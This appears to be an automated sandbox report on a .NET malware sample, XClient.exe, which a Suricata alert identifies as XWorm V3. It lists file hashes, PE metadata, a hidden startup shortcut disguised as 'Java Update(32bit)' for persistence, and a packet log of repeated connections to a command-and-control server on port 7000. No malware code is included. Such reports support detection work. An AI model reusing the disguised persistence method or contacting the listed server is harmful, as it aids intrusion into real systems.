SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmyikero.2vm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qni4ahec.fgi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sp031ufu.mdp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgqlil4n.its.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr4ncbou.czc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygaws05i.uml.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg4vixly.yov.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk

Download File

Process:	C:\Users\user\Desktop\XClient.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 2 07:45:54 2025, mtime=Thu Jan 2 07:45:54 2025, atime=Thu Jan 2 07:45:54 2025, length=42496, window=hide
Category:	dropped
Size (bytes):	720
Entropy (8bit):	4.612941021991696
Encrypted:	false
SSDEEP:	12:8RrcOdYeH+AzKMGufoDjA6SBliqdrgbTKifBmV:86KmMBfoHA6e3uTKifBm
MD5:	D0D8B322B882FB7133357D286738D448
SHA1:	B5CCA17ACA08CA19BD9A157D3A0D8AD9E008EDA0
SHA-256:	B19AC7EC6ACD58BBA99B161A362F326BC6B28EAA54BA8A477D9A5575478325F5
SHA-512:	E71D97CA04C72A41AAB12DEC98BD2E87F8F36D6F7E0374FBD236FD61377B9AD66040ECD73D90024CAED60E21E7E1953BA4031B35DBB65FB6852899A8CE4D5821
Malicious:	false
Preview:	L..................F.... ......\......\......\...............................P.O. .:i.....+00.../C:\...................`.1....."Z.E. PROGRA~3..H......O.I"Z.E....g.........................P.r.o.g.r.a.m.D.a.t.a.....z.2....."Z.E JAVAUP~1.EXE..^......"Z.E"Z.E..........,...............th..J.a.v.a. .U.p.d.a.t.e.(.3.2.b.i.t.)...e.x.e.......T...............-.......S...........p.\.....C:\ProgramData\Java Update(32bit).exe..=.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.J.a.v.a. .U.p.d.a.t.e.(.3.2.b.i.t.)...e.x.e.`.......X.......562258...........hT..CrF.f4... .H........,.......hT..CrF.f4... .H........,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.56894359316851
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	XClient.exe
File size:	42'496 bytes
MD5:	3e0189c1648e7dd2d285558cb6fd7058
SHA1:	09e1be1ba1da3d2f7f68e5c768464368e36df757
SHA256:	52ac1a50dff9ee094363833b629ea01dad640382d0ba424b5b5ad85d5d173715
SHA512:	dc157fbbd4738924d1f774c6e748f93fb763a7a23757a752052f3a12f398ed39f9f0fd3d89de43510d8e600e2ff8b0379a7163e10de2562ea328d23d278b67b1
SSDEEP:	768:XrfDweqDOAngTZOEKreuCCKUS0BMRCJF5Pa9pmxC96vOwhl3/uzd:DDwe42TZOEKaNnFrSF49AxG6vOwXmp
TLSH:	91133A4437E44216E5FF6BFA29B366020771E5038D13DB9E4CD89A9B2B77BC08A407D6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[\|ug............................N.... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40bb4e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67757C5B [Wed Jan 1 17:33:15 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbb00	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9b54	0x9c00	73085d3a2fda260430fed07178444cdc	False	0.4885066105769231	data	5.684582535191259	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x4d8	0x600	2472af5ddbb53779b7381f16b8b9407b	False	0.3756510416666667	data	3.7216503306685733	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	7a2936d66886714b01c121a6d0839372	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc0a0	0x244	data			0.4724137931034483
RT_MANIFEST	0xc2e8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T09:47:00.472202+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	50020	45.141.26.234	7000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:45:02.206989050 CET	49730	80	192.168.2.4	208.95.112.1
Jan 2, 2025 09:45:02.211803913 CET	80	49730	208.95.112.1	192.168.2.4
Jan 2, 2025 09:45:02.211884022 CET	49730	80	192.168.2.4	208.95.112.1
Jan 2, 2025 09:45:02.212590933 CET	49730	80	192.168.2.4	208.95.112.1
Jan 2, 2025 09:45:02.217402935 CET	80	49730	208.95.112.1	192.168.2.4
Jan 2, 2025 09:45:02.665893078 CET	80	49730	208.95.112.1	192.168.2.4
Jan 2, 2025 09:45:02.718873978 CET	49730	80	192.168.2.4	208.95.112.1
Jan 2, 2025 09:45:43.703960896 CET	80	49730	208.95.112.1	192.168.2.4
Jan 2, 2025 09:45:43.704009056 CET	49730	80	192.168.2.4	208.95.112.1
Jan 2, 2025 09:45:59.743218899 CET	49759	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:45:59.747980118 CET	7000	49759	45.141.26.234	192.168.2.4
Jan 2, 2025 09:45:59.749840975 CET	49759	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:45:59.789839029 CET	49759	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:45:59.794677019 CET	7000	49759	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:01.891755104 CET	7000	49759	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:01.891838074 CET	49759	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:05.015942097 CET	49759	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:05.017230988 CET	49795	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:05.020798922 CET	7000	49759	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:05.022099018 CET	7000	49795	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:05.022190094 CET	49795	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:05.043010950 CET	49795	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:05.047856092 CET	7000	49795	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:07.157850981 CET	7000	49795	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:07.158422947 CET	49795	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:09.766019106 CET	49795	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:09.767111063 CET	49826	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:09.770849943 CET	7000	49795	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:09.771925926 CET	7000	49826	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:09.771986008 CET	49826	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:09.785455942 CET	49826	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:09.790276051 CET	7000	49826	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:12.011224031 CET	7000	49826	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:12.011308908 CET	49826	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:14.281591892 CET	49826	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:14.282634974 CET	49852	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:14.286396027 CET	7000	49826	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:14.287482023 CET	7000	49852	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:14.287569046 CET	49852	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:14.302299023 CET	49852	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:14.307074070 CET	7000	49852	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:16.408287048 CET	7000	49852	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:16.408360958 CET	49852	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:17.891129971 CET	49852	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:17.893471003 CET	49872	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:17.895981073 CET	7000	49852	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:17.898303986 CET	7000	49872	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:17.898391962 CET	49872	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:17.922055960 CET	49872	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:17.926951885 CET	7000	49872	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:20.034682989 CET	7000	49872	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:20.034759045 CET	49872	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:22.781950951 CET	49872	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:22.783727884 CET	49902	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:22.786839962 CET	7000	49872	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:22.788538933 CET	7000	49902	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:22.791878939 CET	49902	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:22.807188988 CET	49902	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:22.812009096 CET	7000	49902	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:24.933090925 CET	7000	49902	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:24.934457064 CET	49902	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:28.172337055 CET	49902	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:28.173052073 CET	49938	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:28.177242041 CET	7000	49902	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:28.177834034 CET	7000	49938	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:28.177902937 CET	49938	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:28.191135883 CET	49938	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:28.196006060 CET	7000	49938	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:30.299901962 CET	7000	49938	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:30.300025940 CET	49938	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:33.031879902 CET	49938	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:33.034760952 CET	49972	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:33.036657095 CET	7000	49938	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:33.039582968 CET	7000	49972	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:33.039642096 CET	49972	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:33.053333998 CET	49972	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:33.058136940 CET	7000	49972	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:35.175400019 CET	7000	49972	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:35.176676035 CET	49972	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:36.203603029 CET	49972	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:36.205029011 CET	49994	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:36.208426952 CET	7000	49972	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:36.209883928 CET	7000	49994	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:36.209978104 CET	49994	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:36.233351946 CET	49994	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:36.238141060 CET	7000	49994	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:38.532963037 CET	7000	49994	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:38.533051014 CET	49994	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:38.533083916 CET	7000	49994	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:38.533123970 CET	49994	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:39.281672001 CET	49994	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:39.282491922 CET	50005	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:39.286439896 CET	7000	49994	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:39.287309885 CET	7000	50005	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:39.287391901 CET	50005	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:39.302968025 CET	50005	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:39.307708979 CET	7000	50005	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:41.442178011 CET	7000	50005	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:41.442233086 CET	50005	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:41.922287941 CET	50005	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:41.923389912 CET	50013	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:41.927109003 CET	7000	50005	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:41.928304911 CET	7000	50013	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:41.928374052 CET	50013	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:41.942203045 CET	50013	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:41.947022915 CET	7000	50013	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:42.699011087 CET	49730	80	192.168.2.4	208.95.112.1
Jan 2, 2025 09:46:42.703870058 CET	80	49730	208.95.112.1	192.168.2.4
Jan 2, 2025 09:46:44.051145077 CET	7000	50013	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:44.055905104 CET	50013	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:44.156634092 CET	50013	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:44.157494068 CET	50014	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:44.161403894 CET	7000	50013	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:44.162348986 CET	7000	50014	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:44.162450075 CET	50014	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:44.175805092 CET	50014	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:44.180540085 CET	7000	50014	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:46.300744057 CET	7000	50014	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:46.300811052 CET	50014	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:46.766177893 CET	50014	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:46.767043114 CET	50015	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:46.771044970 CET	7000	50014	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:46.771878004 CET	7000	50015	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:46.771939993 CET	50015	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:46.786714077 CET	50015	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:46.791500092 CET	7000	50015	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:48.911071062 CET	7000	50015	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:48.911139011 CET	50015	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:48.922348976 CET	50015	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:48.924030066 CET	50016	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:48.927156925 CET	7000	50015	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:48.928869009 CET	7000	50016	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:48.928953886 CET	50016	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:48.946645975 CET	50016	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:48.951455116 CET	7000	50016	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:51.077133894 CET	7000	50016	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:51.077188015 CET	50016	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:51.422308922 CET	50016	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:51.423947096 CET	50017	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:51.427128077 CET	7000	50016	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:51.428802013 CET	7000	50017	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:51.429101944 CET	50017	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:51.443300009 CET	50017	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:51.448040962 CET	7000	50017	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:53.571130991 CET	7000	50017	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:53.571243048 CET	50017	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:54.031770945 CET	50017	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:54.033411980 CET	50018	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:54.036586046 CET	7000	50017	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:54.038261890 CET	7000	50018	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:54.038367987 CET	50018	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:54.059007883 CET	50018	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:54.063780069 CET	7000	50018	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:56.160222054 CET	7000	50018	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:56.160295963 CET	50018	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:56.719168901 CET	50018	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:56.720362902 CET	50019	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:56.724009991 CET	7000	50018	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:56.725127935 CET	7000	50019	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:56.725208044 CET	50019	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:56.738873959 CET	50019	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:56.743684053 CET	7000	50019	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:58.871490955 CET	7000	50019	45.141.26.234	192.168.2.4
